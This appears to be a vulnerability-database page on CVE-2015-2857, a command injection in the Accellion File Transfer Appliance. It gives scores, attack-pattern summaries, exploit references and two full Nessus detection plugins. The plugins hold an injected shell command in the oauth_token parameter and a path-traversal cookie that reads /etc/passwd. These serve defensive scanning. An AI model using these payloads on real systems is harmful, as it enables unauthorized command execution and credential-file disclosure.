Vulnerabilities > CVE-2015-2857 - Command Injection vulnerability in Accellion File Transfer Appliance 80540/911200
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
PARTIAL Summary
Accellion File Transfer Appliance before FTA_9_11_210 allows remote attackers to execute arbitrary code via shell metacharacters in the oauth_token parameter.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 2 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Cause Web Server Misclassification An attack of this type exploits a Web server's decision to take action based on filename or file extension. Because different file types are handled by different server processes, misclassification may force the Web server to take unexpected action, or expected actions in an unexpected sequence. This may cause the server to exhaust resources, supply debug or system data to the attacker, or bind an attacker to a remote process. This type of vulnerability has been found in many widely used servers including IIS, Lotus Domino, and Orion. The attacker's job in this case is straightforward, standard communication protocols and methods are used and are generally appended with malicious information at the tail end of an otherwise legitimate request. The attack payload varies, but it could be special characters like a period or simply appending a tag that has a special meaning for operations on the server side like .jsp for a java application server. The essence of this attack is that the attacker deceives the server into executing functionality based on the name of the request, i.e. login.jsp, not the contents.
- LDAP Injection An attacker manipulates or crafts an LDAP query for the purpose of undermining the security of the target. Some applications use user input to create LDAP queries that are processed by an LDAP server. For example, a user might provide their username during authentication and the username might be inserted in an LDAP query during the authentication process. An attacker could use this input to inject additional commands into an LDAP query that could disclose sensitive information. For example, entering a * in the aforementioned query might return information about all users on the system. This attack is very similar to an SQL injection attack in that it manipulates a query to gather additional information or coerce a particular return value.
- Command Delimiters An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or a blacklist input validation, as opposed to whitelist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
- File System Function Injection, Content Based An attack of this type exploits the host's trust in executing remote content including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the attacker and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The attacker exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the attacker knows the standard handling routines and can identify vulnerabilities and entry points they can be exploited by otherwise seemingly normal content. Once the attack is executed, the attackers' program can access relative directories such as C:\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.
- Exploiting Multiple Input Interpretation Layers An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.
Exploit-Db
| description | Accellion FTA getStatus verify_oauth_token Command Execution. CVE-2015-2857. Remote exploit for hardware platform |
| file | exploits/hardware/remote/37597.rb |
| id | EDB-ID:37597 |
| last seen | 2016-02-04 |
| modified | 2015-07-13 |
| platform | hardware |
| port | 443 |
| published | 2015-07-13 |
| reporter | metasploit |
| source | https://www.exploit-db.com/download/37597/ |
| title | Accellion FTA getStatus verify_oauth_token Command Execution |
| type | remote |
Metasploit
| description | This module exploits a metacharacter shell injection vulnerability in the Accellion File Transfer appliance. This vulnerability is triggered when a user-provided 'oauth_token' is passed into a system() call within a mod_perl handler. This module exploits the '/tws/getStatus' endpoint. Other vulnerable handlers include '/seos/find.api', '/seos/put.api', and /seos/mput.api'. This issue was confirmed on version FTA_9_11_200, but may apply to previous versions as well. This issue was fixed in software update FTA_9_11_210. |
| id | MSF:EXPLOIT/LINUX/HTTP/ACCELLION_FTA_GETSTATUS_OAUTH |
| last seen | 2020-05-29 |
| modified | 2017-07-24 |
| published | 2015-07-08 |
| references | |
| reporter | Rapid7 |
| source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb |
| title | Accellion FTA getStatus verify_oauth_token Command Execution |
Nessus
NASL family CGI abuses NASL id ACCELLION_FTA_OAUTH_TOKEN_RCE.NASL description The remote Accellion Secure File Transfer Appliance is affected by a remote command execution vulnerability due to improper sanitization of user-supplied in put to the last seen 2020-06-01 modified 2020-06-02 plugin id 85005 published 2015-07-27 reporter This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/85005 title Accellion Secure File Transfer Appliance 'oauth_token' Parameter Remote Command Execution code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(85005); script_version("1.6"); script_cvs_date("Date: 2019/11/25"); script_cve_id("CVE-2015-2857"); script_xref(name:"EDB-ID", value:"37597"); script_name(english:"Accellion Secure File Transfer Appliance 'oauth_token' Parameter Remote Command Execution"); script_summary(english:"Attempts to execute a command."); script_set_attribute(attribute:"synopsis", value: "The remote device is affected by a remote command execution vulnerability."); script_set_attribute(attribute:"description", value: "The remote Accellion Secure File Transfer Appliance is affected by a remote command execution vulnerability due to improper sanitization of user-supplied in put to the 'oauth_token' parameter in the get_oauth_customer_name() and verify_oauth_token() functions. The parameter is passed to a system() command through the 'twsgetStatus' handler. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary commands on the remote host. Note that the twsPut, twssetStatus, twsGet, Find, Put, and mPut handlers are also reportedly affected by this issue; however, Nessus has not tested these additional handlers."); # https://blog.rapid7.com/2015/07/10/r7-2015-08-accellion-file-transfer-appliance-vulnerabilities-cve-2015-2856-cve-2015-2857/ script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8f6a5d7f"); script_set_attribute(attribute:"solution", value: "Upgrade to Accellion Secure File Transfer Appliance version FTA_9_11_210 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-2857"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Accellion FTA getStatus verify_oauth_token Command Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2015/07/10"); script_set_attribute(attribute:"patch_publication_date", value:"2015/05/25"); script_set_attribute(attribute:"plugin_publication_date", value:"2015/07/27"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/h:accellion:secure_file_transfer_appliance"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("accellion_file_transfer_appliance_detect.nbin"); script_require_keys("installed_sw/Accellion Secure File Transfer Appliance"); script_require_ports("Services/www", 80, 443); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("install_func.inc"); app = "Accellion Secure File Transfer Appliance"; get_install_count(app_name:app, exit_if_zero:TRUE); port = get_http_port(default:443); install = get_single_install(app_name:app, port:port); install_url = build_url(port:port, qs:"/"); data = "transaction_id=1&oauth_token='%3becho '"; clear_cookiejar(); res = http_send_recv3( method : "POST", port : port, data : data, item : "/tws/getStatus", add_headers : make_array("Content-Type","application/x-www-form-urlencoded"), exit_on_fail : TRUE ); if (!egrep(pattern:'"result_msg":"Success"', string:res[2])) audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url); security_report_v4( port : port, severity : SECURITY_HOLE, cmd : 'echo', line_limit : 3, request : make_list(http_last_sent_request()), output : chomp(res[2]) );NASL family CGI abuses NASL id ACCELLION_FTA_STATECODE_FILE_DISCLOSURE.NASL description The remote Accellion Secure File Transfer Appliance is affected by an arbitrary file disclosure vulnerability due to improper sanitization of user-supplied input to the last seen 2020-06-01 modified 2020-06-02 plugin id 85006 published 2015-07-27 reporter This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/85006 title Accellion Secure File Transfer Appliance 'statecode' Cookie Remote File Disclosure code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(85006); script_version("1.8"); script_cvs_date("Date: 2019/11/25"); script_cve_id("CVE-2015-2856"); script_name(english:"Accellion Secure File Transfer Appliance 'statecode' Cookie Remote File Disclosure"); script_summary(english:"Attempts to read a local file."); script_set_attribute(attribute:"synopsis", value: "The remote device is affected by an arbitrary file disclosure vulnerability."); script_set_attribute(attribute:"description", value: "The remote Accellion Secure File Transfer Appliance is affected by an arbitrary file disclosure vulnerability due to improper sanitization of user-supplied input to the 'statecode' cookie used by the template() function in function.inc. A remote, unauthenticated attacker can exploit this vulnerability, via a specially crafted request, to view arbitrary files on the remote host."); # https://blog.rapid7.com/2015/07/10/r7-2015-08-accellion-file-transfer-appliance-vulnerabilities-cve-2015-2856-cve-2015-2857/ script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8f6a5d7f"); script_set_attribute(attribute:"solution", value: "Upgrade to Accellion Secure File Transfer Appliance version FTA_9_11_210 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-2856"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2015/07/10"); script_set_attribute(attribute:"patch_publication_date", value:"2015/05/25"); script_set_attribute(attribute:"plugin_publication_date", value:"2015/07/27"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/h:accellion:secure_file_transfer_appliance"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("accellion_file_transfer_appliance_detect.nbin"); script_require_keys("installed_sw/Accellion Secure File Transfer Appliance"); script_require_ports("Services/www", 80, 443); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("install_func.inc"); app = "Accellion Secure File Transfer Appliance"; get_install_count(app_name:app, exit_if_zero:TRUE); port = get_http_port(default:443); install = get_single_install(app_name:app, port:port); install_url = build_url(port:port, qs:"/"); cookie = 'statecode=../../../../../etc/passwd%00'; file = '/etc/passwd'; file_pat = "root:.*:0:[01]:"; clear_cookiejar(); res = http_send_recv3( method : "POST", port : port, item : "/courier/intermediate_login.html", add_headers : make_array("Cookie", cookie), exit_on_fail : TRUE ); if (!egrep(pattern:file_pat, string:res[2])) audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url); security_report_v4( port : port, severity : SECURITY_WARNING, file : file, request : make_list(http_last_sent_request()), output : chomp(res[2]), attach_type : 'text/plain' );
Packetstorm
| data source | https://packetstormsecurity.com/files/download/132665/accellion_fta_getstatus_oauth.rb.txt |
| id | PACKETSTORM:132665 |
| last seen | 2016-12-05 |
| published | 2015-07-13 |
| reporter | H D Moore |
| source | https://packetstormsecurity.com/files/132665/Accellion-FTA-getStatus-verify_oauth_token-Command-Execution.html |
| title | Accellion FTA getStatus verify_oauth_token Command Execution |
Saint
| description | Accellion FTA getStatus command injection |
| title | accellion_fta_getstatus |
| type | remote |
References
- http://packetstormsecurity.com/files/132665/Accellion-FTA-getStatus-verify_oauth_token-Command-Execution.html
- http://www.rapid7.com/db/modules/exploit/linux/http/accellion_fta_getstatus_oauth
- https://community.rapid7.com/community/metasploit/blog/2015/07/10/r7-2015-08-accellion-file-transfer-appliance-vulnerabilities-cve-2015-2856-cve-2015-2857
- https://www.exploit-db.com/exploits/37597/